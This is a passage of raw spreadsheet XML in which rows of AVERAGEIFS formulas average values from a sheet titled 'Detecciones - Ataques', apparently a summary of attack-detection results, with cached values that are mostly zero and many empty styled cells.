        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AL235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AM235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AN235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AO235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AP235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AR235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AS235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AT235" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AU235" s="271"/>
      <c r="AV235" s="271"/>
      <c r="AW235" s="271"/>
      <c r="AX235" s="271"/>
      <c r="AY235" s="271"/>
      <c r="AZ235" s="271"/>
      <c r="BA235" s="271"/>
      <c r="BB235" s="271"/>
      <c r="BC235" s="271"/>
      <c r="BD235" s="271"/>
      <c r="BE235" s="271"/>
      <c r="BF235" s="271"/>
      <c r="BG235" s="271"/>
      <c r="BH235" s="271"/>
      <c r="BI235" s="271"/>
      <c r="BJ235" s="271"/>
      <c r="BK235" s="271"/>
      <c r="BL235" s="271"/>
      <c r="BM235" s="271"/>
      <c r="BN235" s="271"/>
      <c r="BO235" s="271"/>
      <c r="BP235" s="271"/>
      <c r="BQ235" s="271"/>
      <c r="BR235" s="271"/>
      <c r="BS235" s="271"/>
      <c r="BT235" s="271"/>
      <c r="BU235" s="271"/>
      <c r="BV235" s="271"/>
      <c r="BW235" s="271"/>
      <c r="BX235" s="271"/>
      <c r="BY235" s="271"/>
      <c r="BZ235" s="271"/>
      <c r="CA235" s="271"/>
      <c r="CB235" s="271"/>
      <c r="CC235" s="271"/>
      <c r="CD235" s="271"/>
      <c r="CE235" s="271"/>
      <c r="CF235" s="271"/>
      <c r="CG235" s="271"/>
      <c r="CH235" s="271"/>
      <c r="CI235" s="271"/>
      <c r="CJ235" s="271"/>
      <c r="CK235" s="271"/>
      <c r="CL235" s="271"/>
      <c r="CM235" s="271"/>
      <c r="CN235" s="271"/>
      <c r="CO235" s="271"/>
      <c r="CP235" s="271"/>
      <c r="CQ235" s="271"/>
      <c r="CR235" s="271"/>
      <c r="CS235" s="271"/>
      <c r="CT235" s="271"/>
      <c r="CU235" s="271"/>
      <c r="CV235" s="271"/>
      <c r="CW235" s="271"/>
      <c r="CX235" s="271"/>
      <c r="CY235" s="271"/>
      <c r="CZ235" s="271"/>
      <c r="DA235" s="271"/>
      <c r="DB235" s="271"/>
      <c r="DC235" s="271"/>
      <c r="DD235" s="271"/>
      <c r="DE235" s="271"/>
      <c r="DF235" s="271"/>
      <c r="DG235" s="271"/>
      <c r="DH235" s="271"/>
      <c r="DI235" s="271"/>
      <c r="DJ235" s="271"/>
      <c r="DK235" s="271"/>
    </row>
    <row r="236">
      <c r="L236" s="570"/>
      <c r="M236" s="570"/>
      <c r="N236" s="570"/>
      <c r="O236" s="570"/>
      <c r="Q236" s="271"/>
      <c r="R236" s="271"/>
      <c r="S236" s="271"/>
      <c r="T236" s="271"/>
      <c r="U236" s="271"/>
      <c r="V236" s="271"/>
      <c r="W236" s="271"/>
      <c r="X236" s="271"/>
      <c r="Y236" s="271"/>
      <c r="Z236" s="271"/>
      <c r="AA236" s="271"/>
      <c r="AB236" s="271"/>
      <c r="AC236" s="271"/>
      <c r="AD236" s="271"/>
      <c r="AE236" s="271"/>
      <c r="AF236" s="271"/>
      <c r="AG236" s="271"/>
      <c r="AH236" s="352" t="s">
        <v>1361</v>
      </c>
      <c r="AI236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS236" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT236" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU236" s="271"/>
      <c r="AV236" s="271"/>
      <c r="AW236" s="271"/>
      <c r="AX236" s="271"/>
      <c r="AY236" s="271"/>
      <c r="AZ236" s="271"/>
      <c r="BA236" s="271"/>
      <c r="BB236" s="271"/>
      <c r="BC236" s="271"/>
      <c r="BD236" s="271"/>
      <c r="BE236" s="271"/>
      <c r="BF236" s="271"/>
      <c r="BG236" s="271"/>
      <c r="BH236" s="271"/>
      <c r="BI236" s="271"/>
      <c r="BJ236" s="271"/>
      <c r="BK236" s="271"/>
      <c r="BL236" s="271"/>
      <c r="BM236" s="271"/>
      <c r="BN236" s="271"/>
      <c r="BO236" s="271"/>
      <c r="BP236" s="271"/>
      <c r="BQ236" s="271"/>
      <c r="BR236" s="271"/>
      <c r="BS236" s="271"/>
      <c r="BT236" s="271"/>
      <c r="BU236" s="271"/>
      <c r="BV236" s="271"/>
      <c r="BW236" s="271"/>
      <c r="BX236" s="271"/>
      <c r="BY236" s="271"/>
      <c r="BZ236" s="271"/>
      <c r="CA236" s="271"/>
      <c r="CB236" s="271"/>
      <c r="CC236" s="271"/>
      <c r="CD236" s="271"/>
      <c r="CE236" s="271"/>
      <c r="CF236" s="271"/>
      <c r="CG236" s="271"/>
      <c r="CH236" s="271"/>
      <c r="CI236" s="271"/>
      <c r="CJ236" s="271"/>
      <c r="CK236" s="271"/>
      <c r="CL236" s="271"/>
      <c r="CM236" s="271"/>
      <c r="CN236" s="271"/>
      <c r="CO236" s="271"/>
      <c r="CP236" s="271"/>
      <c r="CQ236" s="271"/>
      <c r="CR236" s="271"/>
      <c r="CS236" s="271"/>
      <c r="CT236" s="271"/>
      <c r="CU236" s="271"/>
      <c r="CV236" s="271"/>
      <c r="CW236" s="271"/>
      <c r="CX236" s="271"/>
      <c r="CY236" s="271"/>
      <c r="CZ236" s="271"/>
      <c r="DA236" s="271"/>
      <c r="DB236" s="271"/>
      <c r="DC236" s="271"/>
      <c r="DD236" s="271"/>
      <c r="DE236" s="271"/>
      <c r="DF236" s="271"/>
      <c r="DG236" s="271"/>
      <c r="DH236" s="271"/>
      <c r="DI236" s="271"/>
      <c r="DJ236" s="271"/>
      <c r="DK236" s="271"/>
    </row>
    <row r="237">
      <c r="L237" s="570"/>
      <c r="M237" s="570"/>
      <c r="N237" s="570"/>
      <c r="O237" s="570"/>
      <c r="Q237" s="271"/>
      <c r="R237" s="271"/>
      <c r="S237" s="271"/>
      <c r="T237" s="271"/>
      <c r="U237" s="271"/>
      <c r="V237" s="271"/>
      <c r="W237" s="271"/>
      <c r="X237" s="271"/>
      <c r="Y237" s="271"/>
      <c r="Z237" s="271"/>
      <c r="AA237" s="271"/>
      <c r="AB237" s="271"/>
      <c r="AC237" s="271"/>
      <c r="AD237" s="271"/>
      <c r="AE237" s="271"/>
      <c r="AF237" s="271"/>
      <c r="AG237" s="271"/>
      <c r="AH237" s="352" t="s">
        <v>701</v>
      </c>
      <c r="AI237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AK237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AL237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AM237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AN237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AO237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AP237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AR237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AS237" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AT237" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="AU237" s="271"/>
      <c r="AV237" s="271"/>
      <c r="AW237" s="271"/>
      <c r="AX237" s="271"/>
      <c r="AY237" s="271"/>
      <c r="AZ237" s="271"/>
      <c r="BA237" s="271"/>
      <c r="BB237" s="271"/>
      <c r="BC237" s="271"/>
      <c r="BD237" s="271"/>
      <c r="BE237" s="271"/>
      <c r="BF237" s="271"/>
      <c r="BG237" s="271"/>
      <c r="BH237" s="271"/>
      <c r="BI237" s="271"/>
      <c r="BJ237" s="271"/>
      <c r="BK237" s="271"/>
      <c r="BL237" s="271"/>
      <c r="BM237" s="271"/>
      <c r="BN237" s="271"/>
      <c r="BO237" s="271"/>
      <c r="BP237" s="271"/>
      <c r="BQ237" s="271"/>
      <c r="BR237" s="271"/>
      <c r="BS237" s="271"/>
      <c r="BT237" s="271"/>
      <c r="BU237" s="271"/>
      <c r="BV237" s="271"/>
      <c r="BW237" s="271"/>
      <c r="BX237" s="271"/>
      <c r="BY237" s="271"/>
      <c r="BZ237" s="271"/>
      <c r="CA237" s="271"/>
      <c r="CB237" s="271"/>
      <c r="CC237" s="271"/>
      <c r="CD237" s="271"/>
      <c r="CE237" s="271"/>
      <c r="CF237" s="271"/>
      <c r="CG237" s="271"/>
      <c r="CH237" s="271"/>
      <c r="CI237" s="271"/>
      <c r="CJ237" s="271"/>
      <c r="CK237" s="271"/>
      <c r="CL237" s="271"/>
      <c r="CM237" s="271"/>
      <c r="CN237" s="271"/>
      <c r="CO237" s="271"/>
      <c r="CP237" s="271"/>
      <c r="CQ237" s="271"/>
      <c r="CR237" s="271"/>
      <c r="CS237" s="271"/>
      <c r="CT237" s="271"/>
      <c r="CU237" s="271"/>
      <c r="CV237" s="271"/>
      <c r="CW237" s="271"/>
      <c r="CX237" s="271"/>
      <c r="CY237" s="271"/>
      <c r="CZ237" s="271"/>
      <c r="DA237" s="271"/>
      <c r="DB237" s="271"/>
      <c r="DC237" s="271"/>
      <c r="DD237" s="271"/>
      <c r="DE237" s="271"/>
      <c r="DF237" s="271"/>
      <c r="DG237" s="271"/>
      <c r="DH237" s="271"/>
      <c r="DI237" s="271"/>
      <c r="DJ237" s="271"/>
      <c r="DK237" s="271"/>
    </row>
    <row r="238">
      <c r="L238" s="570"/>
      <c r="M238" s="570"/>
      <c r="N238" s="570"/>
      <c r="O238" s="570"/>
      <c r="Q238" s="271"/>
      <c r="R238" s="271"/>
      <c r="S238" s="271"/>
      <c r="T238" s="271"/>
      <c r="U238" s="271"/>
      <c r="V238" s="271"/>
      <c r="W238" s="271"/>
      <c r="X238" s="271"/>
      <c r="Y238" s="271"/>
      <c r="Z238" s="271"/>
      <c r="AA238" s="271"/>
      <c r="AB238" s="271"/>
      <c r="AC238" s="271"/>
      <c r="AD238" s="271"/>
      <c r="AE238" s="271"/>
      <c r="AF238" s="271"/>
      <c r="AG238" s="271"/>
      <c r="AH238" s="352" t="s">
        <v>586</v>
      </c>
      <c r="AI238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AK238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AL238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AM238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AN238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AO238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AP238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AQ238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AR238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AS238" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="AT238" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AU238" s="271"/>
      <c r="AV238" s="271"/>
      <c r="AW238" s="271"/>
      <c r="AX238" s="271"/>
      <c r="AY238" s="271"/>
      <c r="AZ238" s="271"/>
      <c r="BA238" s="271"/>
      <c r="BB238" s="271"/>
      <c r="BC238" s="271"/>
      <c r="BD238" s="271"/>
      <c r="BE238" s="271"/>
      <c r="BF238" s="271"/>
      <c r="BG238" s="271"/>
      <c r="BH238" s="271"/>
      <c r="BI238" s="271"/>
      <c r="BJ238" s="271"/>
      <c r="BK238" s="271"/>
      <c r="BL238" s="271"/>
      <c r="BM238" s="271"/>
      <c r="BN238" s="271"/>
      <c r="BO238" s="271"/>
      <c r="BP238" s="271"/>
      <c r="BQ238" s="271"/>
      <c r="BR238" s="271"/>
      <c r="BS238" s="271"/>
      <c r="BT238" s="271"/>
      <c r="BU238" s="271"/>
      <c r="BV238" s="271"/>
      <c r="BW238" s="271"/>
      <c r="BX238" s="271"/>
      <c r="BY238" s="271"/>
      <c r="BZ238" s="271"/>
      <c r="CA238" s="271"/>
      <c r="CB238" s="271"/>
      <c r="CC238" s="271"/>
      <c r="CD238" s="271"/>
      <c r="CE238" s="271"/>
      <c r="CF238" s="271"/>
      <c r="CG238" s="271"/>
      <c r="CH238" s="271"/>
      <c r="CI238" s="271"/>
      <c r="CJ238" s="271"/>
      <c r="CK238" s="271"/>
      <c r="CL238" s="271"/>
      <c r="CM238" s="271"/>
      <c r="CN238" s="271"/>
      <c r="CO238" s="271"/>
      <c r="CP238" s="271"/>
      <c r="CQ238" s="271"/>
      <c r="CR238" s="271"/>
      <c r="CS238" s="271"/>
      <c r="CT238" s="271"/>
      <c r="CU238" s="271"/>
      <c r="CV238" s="271"/>
      <c r="CW238" s="271"/>
      <c r="CX238" s="271"/>
      <c r="CY238" s="271"/>
      <c r="CZ238" s="271"/>
      <c r="DA238" s="271"/>
      <c r="DB238" s="271"/>
      <c r="DC238" s="271"/>
      <c r="DD238" s="271"/>
      <c r="DE238" s="271"/>
      <c r="DF238" s="271"/>
      <c r="DG238" s="271"/>
      <c r="DH238" s="271"/>
      <c r="DI238" s="271"/>
      <c r="DJ238" s="271"/>
      <c r="DK238" s="271"/>
    </row>
    <row r="239">
      <c r="L239" s="570"/>
      <c r="M239" s="570"/>
      <c r="N239" s="570"/>
      <c r="O239" s="570"/>
      <c r="Q239" s="271"/>
      <c r="R239" s="271"/>
      <c r="S239" s="271"/>
      <c r="T239" s="271"/>
      <c r="U239" s="271"/>
      <c r="V239" s="271"/>
      <c r="W239" s="271"/>
      <c r="X239" s="271"/>
      <c r="Y239" s="271"/>
      <c r="Z239" s="271"/>
      <c r="AA239" s="271"/>
      <c r="AB239" s="271"/>
      <c r="AC239" s="271"/>
      <c r="AD239" s="271"/>
      <c r="AE239" s="271"/>
      <c r="AF239" s="271"/>
      <c r="AG239" s="271"/>
      <c r="AH239" s="352" t="s">
        <v>294</v>
      </c>
      <c r="AI239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS239" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT239" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU239" s="271"/>
      <c r="AV239" s="271"/>
      <c r="AW239" s="271"/>
      <c r="AX239" s="271"/>
      <c r="AY239" s="271"/>
      <c r="AZ239" s="271"/>
      <c r="BA239" s="271"/>
      <c r="BB239" s="271"/>
      <c r="BC239" s="271"/>
      <c r="BD239" s="271"/>
      <c r="BE239" s="271"/>
      <c r="BF239" s="271"/>
      <c r="BG239" s="271"/>
      <c r="BH239" s="271"/>
      <c r="BI239" s="271"/>
      <c r="BJ239" s="271"/>
      <c r="BK239" s="271"/>
      <c r="BL239" s="271"/>
      <c r="BM239" s="271"/>
      <c r="BN239" s="271"/>
      <c r="BO239" s="271"/>
      <c r="BP239" s="271"/>
      <c r="BQ239" s="271"/>
      <c r="BR239" s="271"/>
      <c r="BS239" s="271"/>
      <c r="BT239" s="271"/>
      <c r="BU239" s="271"/>
      <c r="BV239" s="271"/>
      <c r="BW239" s="271"/>
      <c r="BX239" s="271"/>
      <c r="BY239" s="271"/>
      <c r="BZ239" s="271"/>
      <c r="CA239" s="271"/>
      <c r="CB239" s="271"/>
      <c r="CC239" s="271"/>
      <c r="CD239" s="271"/>
      <c r="CE239" s="271"/>
      <c r="CF239" s="271"/>
      <c r="CG239" s="271"/>
      <c r="CH239" s="271"/>
      <c r="CI239" s="271"/>
      <c r="CJ239" s="271"/>
      <c r="CK239" s="271"/>
      <c r="CL239" s="271"/>
      <c r="CM239" s="271"/>
      <c r="CN239" s="271"/>
      <c r="CO239" s="271"/>
      <c r="CP239" s="271"/>
      <c r="CQ239" s="271"/>
      <c r="CR239" s="271"/>
      <c r="CS239" s="271"/>
      <c r="CT239" s="271"/>
      <c r="CU239" s="271"/>
      <c r="CV239" s="271"/>
      <c r="CW239" s="271"/>
      <c r="CX239" s="271"/>
      <c r="CY239" s="271"/>
      <c r="CZ239" s="271"/>
      <c r="DA239" s="271"/>
      <c r="DB239" s="271"/>
      <c r="DC239" s="271"/>
      <c r="DD239" s="271"/>
      <c r="DE239" s="271"/>
      <c r="DF239" s="271"/>
      <c r="DG239" s="271"/>
      <c r="DH239" s="271"/>
      <c r="DI239" s="271"/>
      <c r="DJ239" s="271"/>
      <c r="DK239" s="271"/>
    </row>
    <row r="240">
      <c r="Q240" s="271"/>
      <c r="R240" s="271"/>
      <c r="S240" s="271"/>
      <c r="T240" s="271"/>
      <c r="U240" s="271"/>
      <c r="V240" s="271"/>
      <c r="W240" s="271"/>
      <c r="X240" s="271"/>
      <c r="Y240" s="271"/>
      <c r="Z240" s="271"/>
      <c r="AA240" s="271"/>
      <c r="AB240" s="271"/>
      <c r="AC240" s="271"/>
      <c r="AD240" s="271"/>
      <c r="AE240" s="271"/>
      <c r="AF240" s="271"/>
      <c r="AG240" s="271"/>
      <c r="AH240" s="352" t="s">
        <v>339</v>
      </c>
      <c r="AI240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS240" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT240" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU240" s="271"/>
      <c r="AV240" s="271"/>
      <c r="AW240" s="271"/>
      <c r="AX240" s="271"/>
      <c r="AY240" s="271"/>
      <c r="AZ240" s="271"/>
      <c r="BA240" s="271"/>
      <c r="BB240" s="271"/>
      <c r="BC240" s="271"/>
      <c r="BD240" s="271"/>
      <c r="BE240" s="271"/>
      <c r="BF240" s="271"/>
      <c r="BG240" s="271"/>
      <c r="BH240" s="271"/>
      <c r="BI240" s="271"/>
      <c r="BJ240" s="271"/>
      <c r="BK240" s="271"/>
      <c r="BL240" s="271"/>
      <c r="BM240" s="271"/>
      <c r="BN240" s="271"/>
      <c r="BO240" s="271"/>
      <c r="BP240" s="271"/>
      <c r="BQ240" s="271"/>
      <c r="BR240" s="271"/>
      <c r="BS240" s="271"/>
      <c r="BT240" s="271"/>
      <c r="BU240" s="271"/>
      <c r="BV240" s="271"/>
      <c r="BW240" s="271"/>
      <c r="BX240" s="271"/>
      <c r="BY240" s="271"/>
      <c r="BZ240" s="271"/>
      <c r="CA240" s="271"/>
      <c r="CB240" s="271"/>
      <c r="CC240" s="271"/>
      <c r="CD240" s="271"/>
      <c r="CE240" s="271"/>
      <c r="CF240" s="271"/>
      <c r="CG240" s="271"/>
      <c r="CH240" s="271"/>
      <c r="CI240" s="271"/>
      <c r="CJ240" s="271"/>
      <c r="CK240" s="271"/>
      <c r="CL240" s="271"/>
      <c r="CM240" s="271"/>
      <c r="CN240" s="271"/>
      <c r="CO240" s="271"/>
      <c r="CP240" s="271"/>
      <c r="CQ240" s="271"/>
      <c r="CR240" s="271"/>
      <c r="CS240" s="271"/>
      <c r="CT240" s="271"/>
      <c r="CU240" s="271"/>
      <c r="CV240" s="271"/>
      <c r="CW240" s="271"/>
      <c r="CX240" s="271"/>
      <c r="CY240" s="271"/>
      <c r="CZ240" s="271"/>
      <c r="DA240" s="271"/>
      <c r="DB240" s="271"/>
      <c r="DC240" s="271"/>
      <c r="DD240" s="271"/>
      <c r="DE240" s="271"/>
      <c r="DF240" s="271"/>
      <c r="DG240" s="271"/>
      <c r="DH240" s="271"/>
      <c r="DI240" s="271"/>
      <c r="DJ240" s="271"/>
      <c r="DK240" s="271"/>
    </row>
    <row r="241">
      <c r="Q241" s="271"/>
      <c r="R241" s="271"/>
      <c r="S241" s="271"/>
      <c r="T241" s="271"/>
      <c r="U241" s="271"/>
      <c r="V241" s="271"/>
      <c r="W241" s="271"/>
      <c r="X241" s="271"/>
      <c r="Y241" s="271"/>
      <c r="Z241" s="271"/>
      <c r="AA241" s="271"/>
      <c r="AB241" s="271"/>
      <c r="AC241" s="271"/>
      <c r="AD241" s="271"/>
      <c r="AE241" s="271"/>
      <c r="AF241" s="271"/>
      <c r="AG241" s="271"/>
      <c r="AH241" s="352" t="s">
        <v>370</v>
      </c>
      <c r="AI241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ241" s="533" t="s">
        <v>12</v>
